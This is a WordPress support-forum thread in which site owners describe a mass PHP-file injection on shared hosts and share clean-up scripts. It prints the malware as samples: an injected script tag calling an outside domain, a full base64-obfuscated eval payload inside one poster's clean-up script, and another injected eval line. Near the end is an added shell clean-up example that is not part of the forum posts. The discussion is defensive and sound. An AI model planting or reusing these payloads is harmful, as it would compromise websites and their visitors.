• First off, sorry if this is the wrong section. My site is self hosted on WordPress 2.8.6 and has been hacked as of yesterday; a bit of code:

    <script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>

    was put into the site, along with some other code. I am in the process of deleting everything right now, MySQL and all my files, but the above code is still here. What should I do to get rid of it? And what could be the cause of this virus? Any tips/suggestions would be awesome, thanks.

    Site at the moment (safe): view-source:https://www.dailyotaku.com/

Viewing 13 replies - 46 through 58 (of 58 total)
  • @redkathy – you can export your database. Make sure it’s a .sql file before viewing… if it’s a zip file, unzip it first.

    Then use a program like WordPad to open the file so you can view it.

    You can then do a Find search for whatever it is you’re looking for.

    @wpbloghost – Thanks for the instruction. The first attack I was so very lost, it took forever to clean the sites. This time not so bad. I hope we don’t get used to doing this.

    @wpbloghost – export and back up file, the same thing?

    Yes.

    Worth the read . .

    Anonymous said…

    I was called in to look at some hosting servers at a small company that got hit with something similar to this earlier this year. Their hosted sites were php, asp and coldfusion sites (no wordpress, joomla or any sort of control panel). All index/home/main/default files – regardless of whether they were php, asp, cfm or even html had various javascripts included. It certainly looked like it was an FTP exploit with either privilege escalation so their bot could traverse user directories and write, or they somehow got the ftp user/pass db. Logs did not indicate brute force attacks. File changes came from multiple locations around the world.

    All,

    We’ve posted instructions for fixing the issue at https://fwd4.me/MFK. Please make sure that you follow all of the steps, including the ‘permanent fix’.

    Salem

    OK, the solution GoDaddy is giving, respectfully, is useless.

    My website has Joomla installed and is hosted on a GoDaddy server. I’m proud to say I have completely removed the virus using my own scripting skills; all it took was 10 mins. The virus is hardly that; it’s just code that somehow bypassed GoDaddy’s security and was able to write itself to all PHP files.

    This is the script I developed and used with success.
    It’s kind of tricky; you need to do a couple of things before using the script.

    Run this command over SSH: find . -name "*.php" -type f -print

    That will display all PHP files in your directory, including subdirectories.

    If you don’t know how to execute it, just use a cron job; it should email it to you with no problem.

    Now you save it in a text file named “php.txt”.

    Upload php.txt along with anything.php; anything.php contains the following:
    (please change what I ask you to change)
    The script isn’t perfect but should do the job.

    Only use this as a last resort, and back up your website before use as well, just in case.

    <?php
    // Read the list of PHP paths produced by the find command (one path per line).
    $files = file_get_contents('php.txt');
    $afiles = explode("\n", $files);

    for ($i = 0; $i < count($afiles); $i++) { // you might want to lessen the loops if your website is big
        qabandi($afiles[$i]);
    }

    function qabandi($file) {
        $file = trim($file);
        if ($file === '') { // skip the empty trailing entry that explode() leaves
            return;
        }
        $sick = "{rest of location}" . $file; // this is where you add the rest of the location (path prefix)
        $content = file_get_contents($sick);
        // Strip the injected block returned by bad() and write the file back in place.
        $clean = str_replace(bad(), "", $content);
        $handle = fopen($sick, "w+");
        fwrite($handle, $clean);
        fclose($handle);
        echo($sick . "[cleaned]\n");
    }

     function bad(){ return base64_decode("PD9waHAgLyoqLyBldmFsKGJhc2U2NF9kZWNvZGUoImFXWW9ablZ1WTNScGIyNWZaWGhwYzNSektD
    ZHZZbDl6ZEdGeWRDY3BKaVloYVhOelpYUW9KRWRNVDBKQlRGTmJKMjF5WDI1dkoxMHBLWHNnSUNB
    a1IweFBRa0ZNVTFzbmJYSmZibThuWFQweE95QWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1v
    SjIxeWIySm9KeWtwZXlBZ0lDQWdJR2xtS0NGbWRXNWpkR2x2Ymw5bGVHbHpkSE1vSjJkdGJDY3BL
    WHNnSUNBZ0lHWjFibU4wYVc5dUlHZHRiQ2dwZXlBZ0lDQWdJR2xtSUNnaGMzUnlhWE4wY2lna1gx
    TkZVbFpGVWxzaVNGUlVVRjlWVTBWU1gwRkhSVTVVSWwwc0ltZHZiMmRzWldKdmRDSXBKaVlnS0NG
    emRISnBjM1J5S0NSZlUwVlNWa1ZTV3lKSVZGUlFYMVZUUlZKZlFVZEZUbFFpWFN3aWVXRm9iMjhp
    S1NrcGV5QWdJQ0FnSUNCeVpYUjFjbTRnWW1GelpUWTBYMlJsWTI5a1pTZ2lVRWhPYW1OdGJIZGtR
    MEo2WTIxTk9VbHRhREJrU0VFMlRIazVjbHBIY0hKYWJYQjZZVEpTYldGdGVIcGhNbEp4V21rMWFt
    SXlNSFpoTTBGMVkwZG9kMGxxTkRoTU0wNXFZMjFzZDJSRU5EMGlLVHNnSUNBZ0lDQjlJQ0FnSUNB
    Z2NtVjBkWEp1SUNJaU95QWdJQ0FnZlNBZ0lDQjlJQ0FnSUNBZ0lDQnBaaWdoWm5WdVkzUnBiMjVm
    WlhocGMzUnpLQ2RuZW1SbFkyOWtaU2NwS1hzZ0lDQWdJR1oxYm1OMGFXOXVJR2Q2WkdWamIyUmxL
    Q1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXBleUFnSUNBZ0lD
    UlNNekJDTWtGQ09FUkRNVFE1TmtRd05rSXlNekJCTnpGRU9EazJNa0ZHTlVROVFHOXlaQ2hBYzNW
    aWMzUnlLQ1JTTlVFNVEwWXhRalE1TnpVd01rRkRRVEl6UXpoR05qRXhRVFUyTkRZNE5FTXNNeXd4
    S1NrN0lDQWdJQ0FnSkZKQ1JUUkRORVF3TXpkRk9UTTVNakkyUmpZMU9ERXlPRGcxUVRVelJFRkVP
    VDB4TURzZ0lDQWdJQ0FrVWtFelJEVXlSVFV5UVRRNE9UTTJRMFJGTUVZMU16VTJRa0l3T0RZMU1r
    WXlQVEE3SUNBZ0lDQWdhV1lvSkZJek1FSXlRVUk0UkVNeE5EazJSREEyUWpJek1FRTNNVVE0T1RZ
    eVFVWTFSQ1kwS1hzZ0lDQWdJQ0FnSkZJMk0wSkZSRVUyUWpFNU1qWTJSRFJGUmtWQlJEQTNRVFJF
    T1RGRk1qbEZRajFBZFc1d1lXTnJLQ2QySnl4emRXSnpkSElvSkZJMVFUbERSakZDTkRrM05UQXlR
    VU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXd4TUN3eUtTazdJQ0FnSUNBZ0lDUlNOak5DUlVSRk5r
    SXhPVEkyTmtRMFJVWkZRVVF3TjBFMFJEa3hSVEk1UlVJOUpGSTJNMEpGUkVVMlFqRTVNalkyUkRS
    RlJrVkJSREEzUVRSRU9URkZNamxGUWxzeFhUc2dJQ0FnSUNBZ0pGSkNSVFJETkVRd016ZEZPVE01
    TWpJMlJqWTFPREV5T0RnMVFUVXpSRUZFT1NzOU1pc2tVall6UWtWRVJUWkNNVGt5TmpaRU5FVkdS
    VUZFTURkQk5FUTVNVVV5T1VWQ095QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6
    RTBPVFpFTURaQ01qTXdRVGN4UkRnNU5qSkJSalZFSmpncGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRB
    ek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1UFVCemRISndiM01vSkZJMVFUbERSakZD
    TkRrM05UQXlRVU5CTWpORE9FWTJNVEZCTlRZME5qZzBReXhqYUhJb01Da3NKRkpDUlRSRE5FUXdN
    emRGT1RNNU1qSTJSalkxT0RFeU9EZzFRVFV6UkVGRU9Ta3JNVHNnSUNBZ0lDQjlJQ0FnSUNBZ2FX
    WW9KRkl6TUVJeVFVSTRSRU14TkRrMlJEQTJRakl6TUVFM01VUTRPVFl5UVVZMVJDWXhOaWw3SUNB
    Z0lDQWdJQ1JTUWtVMFF6UkVNRE0zUlRrek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEazlRSE4w
    Y25CdmN5Z2tValZCT1VOR01VSTBPVGMxTURKQlEwRXlNME00UmpZeE1VRTFOalEyT0RSRExHTm9j
    aWd3S1N3a1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0T0RWQk5UTkVRVVE1S1NzeE95
    QWdJQ0FnSUgwZ0lDQWdJQ0JwWmlna1VqTXdRakpCUWpoRVF6RTBPVFpFTURaQ01qTXdRVGN4UkRn
    NU5qSkJSalZFSmpJcGV5QWdJQ0FnSUNBa1VrSkZORU0wUkRBek4wVTVNemt5TWpaR05qVTRNVEk0
    T0RWQk5UTkVRVVE1S3oweU95QWdJQ0FnSUgwZ0lDQWdJQ0FrVWpBek5FRkZNa0ZDT1RSR09UbERR
    emd4UWpNNE9VRXhPREl5UkVFek16VXpQVUJuZW1sdVpteGhkR1VvUUhOMVluTjBjaWdrVWpWQk9V
    TkdNVUkwT1RjMU1ESkJRMEV5TTBNNFJqWXhNVUUxTmpRMk9EUkRMQ1JTUWtVMFF6UkVNRE0zUlRr
    ek9USXlOa1kyTlRneE1qZzROVUUxTTBSQlJEa3BLVHNnSUNBZ0lDQnBaaWdrVWpBek5FRkZNa0ZD
    T1RSR09UbERRemd4UWpNNE9VRXhPREl5UkVFek16VXpQVDA5UmtGTVUwVXBleUFnSUNBZ0lDQWtV
    akF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVelBTUlNOVUU1UTBZeFFq
    UTVOelV3TWtGRFFUSXpRemhHTmpFeFFUVTJORFk0TkVNN0lDQWdJQ0FnZlNBZ0lDQWdJSEpsZEhW
    eWJpQWtVakF6TkVGRk1rRkNPVFJHT1RsRFF6Z3hRak00T1VFeE9ESXlSRUV6TXpVek95QWdJQ0Fn
    ZlNBZ0lDQjlJQ0FnSUdaMWJtTjBhVzl1SUcxeWIySm9LQ1JTUlRneVJVVTVRakV5TVVZM01EazRP
    VFZGUmpVMFJVSkJOMFpCTmtJM09FSXBleUFnSUNBZ1NHVmhaR1Z5S0NkRGIyNTBaVzUwTFVWdVky
    OWthVzVuT2lCdWIyNWxKeWs3SUNBZ0lDQWtVa0V4TnpsQlFrUXpRVGRDT1VVeU9FTXpOamxHTjBJ
    MU9VTTFNVUk0TVVSRlBXZDZaR1ZqYjJSbEtDUlNSVGd5UlVVNVFqRXlNVVkzTURrNE9UVkZSalUw
    UlVKQk4wWkJOa0kzT0VJcE95QWdJQ0FnSUNCcFppaHdjbVZuWDIxaGRHTm9LQ2N2WER4Y0wySnZa
    SGt2YzJrbkxDUlNRVEUzT1VGQ1JETkJOMEk1UlRJNFF6TTJPVVkzUWpVNVF6VXhRamd4UkVVcEtY
    c2dJQ0FnSUNCeVpYUjFjbTRnY0hKbFoxOXlaWEJzWVdObEtDY3ZLRnc4WEM5aWIyUjVXMTVjUGww
    cVhENHBMM05wSnl4bmJXd29LUzRpWEc0aUxpY2tNU2NzSkZKQk1UYzVRVUpFTTBFM1FqbEZNamhE
    TXpZNVJqZENOVGxETlRGQ09ERkVSU2s3SUNBZ0lDQjlaV3h6WlhzZ0lDQWdJQ0J5WlhSMWNtNGdK
    RkpCTVRjNVFVSkVNMEUzUWpsRk1qaERNelk1UmpkQ05UbEROVEZDT0RGRVJTNW5iV3dvS1RzZ0lD
    QWdJSDBnSUNBZ2ZTQWdJQ0J2WWw5emRHRnlkQ2duYlhKdlltZ25LVHNnSUNCOUlDQjkiKSk7Pz4=");}function good(){return base64_decode("PD9QSFAgLyphbC1xYWJhbmRpQGhvdG1haWwuY29tKi8gPz4=");}
    
    ?>

    These criminals have discovered serious vulnerabilities in many popular hosting companies, and these companies must step up their effort to protect their customers.

    That’s really the bottom line.

    In the meantime, it is clear that not only WP sites were attacked on GoDaddy (I run a Drupal site, and it was attacked too). The “base64_decode” line was injected into every single .PHP file.

    While it is clear how to restore the site, what I have not seen so far is what GoDaddy is doing to recognize that the problem is not WP or any other CMS, but a vulnerability on their side.

    You can’t cure a sick person if the sick person does not recognize he is sick.

    Peter

    Yes, I agree petercasier. It is not a vulnerability in WordPress, Joomla or Drupal; it’s a vulnerability in GoDaddy itself as a host. This is very disappointing, I must say.

    Can anyone locate where these hackers are from!!????

    This is not funny!!

    I also got hacked. ALL the .php files on my site(s) are infected with the following:

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzEvZDE3MjUyNDQ1Mi9odGRvY3MvYmxvZy93cC1pbmNsdWRlcy9qcy90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>

    And there were some strange additions to the .htaccess file in the logs folder. I’m hosted by 1and1.com and have sent them a ticket on this but haven’t heard back yet. From what I’ve read here it’s not just WordPress and it’s also pretty widespread.

    What ticks me off is the amount of work I had to do for just ONE of my blogs to clean up this crap (including replacing the MySQL database) and I can’t bear the thought of having to do that for EACH AND EVERY ONE of my other sites.

    Is there some kind of script or some mojo thingee that can grind through all this and remove it? I’m not enough of a code monkey to figure it out myself – I only know enough to screw things up unless I have very clear instructions.

    Anyone? Anyone? Bueller?

    thanks
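A safer version of what the clean-up script earlier in this page does, and the bulk clean-up asked for in the last post, as an added example that is none of the posters’ code and not GoDaddy’s fix: it lists the .php files that carry the injected eval(base64_decode(...)) line quoted in this thread, quarantines a copy of each hit outside the webroot, and strips only that block. The directory layout, the quarantine path and the base64 blob are constructed for the demo, and the script assumes the injection begins at the start of a line, as in the posted sample.

```shell
#!/bin/sh
# Added example, not the poster's script or the host's fix: find PHP files
# carrying the one-line "<?php /**/eval(base64_decode('...')); ?>" injection
# quoted in this thread, quarantine a copy of each hit outside the webroot,
# and strip only that injected block. Assumes the injection starts at the
# beginning of a line, as in the posted sample. All paths are constructed.
set -u

# ERE for the injected block: PHP open tag, empty comment, eval of a base64 blob, close tag.
INJ='<\?php /\*\*/[ ]*eval\(base64_decode\(['\''"][A-Za-z0-9+/=]*['\''"]\)\);[ ]*\?>'

# Print every .php file under $1 that has a line starting with the injection.
list_infected() {
    find "$1" -type f -name '*.php' -exec grep -lE "^${INJ}" {} +
}

count_infected() { list_infected "$1" | wc -l | tr -d ' '; }

# Clean $1, keeping the original in quarantine dir $2 as evidence for the
# hosting ticket. A line that is only the injection is dropped; where
# legitimate code shares the line, just the injected prefix is removed.
clean_file() {
    f=$1; bak=$2
    tmp=$(mktemp) || return 1
    sed -E -e "\|^${INJ}[ ]*\$|d" -e "s|^${INJ}||" "$f" > "$tmp"
    if cmp -s "$f" "$tmp"; then
        rm -f "$tmp"; echo "unchanged: $f"
    else
        mkdir -p "$bak"
        cp -p "$f" "$bak/$(echo "$f" | tr '/' '_')"
        cat "$tmp" > "$f"; rm -f "$tmp"   # cat keeps the file's owner and mode
        echo "cleaned: $f"
    fi
}

# Constructed demo tree: an own-line injection, a shared-line injection, and a
# legitimate base64_decode() call that must survive untouched.
DEMO=$(mktemp -d); BAK="$DEMO/quarantine"; mkdir -p "$DEMO/site/wp-includes"
PAYLOAD="<?php /**/eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>"   # blob decodes to "constructed"
printf '%s\n%s\n' "$PAYLOAD" '<?php echo "index";' > "$DEMO/site/index.php"
printf '%s%s\n' "$PAYLOAD" '<?php echo "inc";' > "$DEMO/site/wp-includes/a.php"
printf '%s\n' '<?php echo base64_decode("aGk="); // legitimate' > "$DEMO/site/ok.php"

list_infected "$DEMO/site" | while read -r f; do clean_file "$f" "$BAK"; done
```

Run it against a copy of the site first and diff the quarantined originals against the cleaned files before touching the live webroot; files whose injection was not on its own line keep their remaining code intact.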

  • The topic ‘Site Hacked’ is closed to new replies.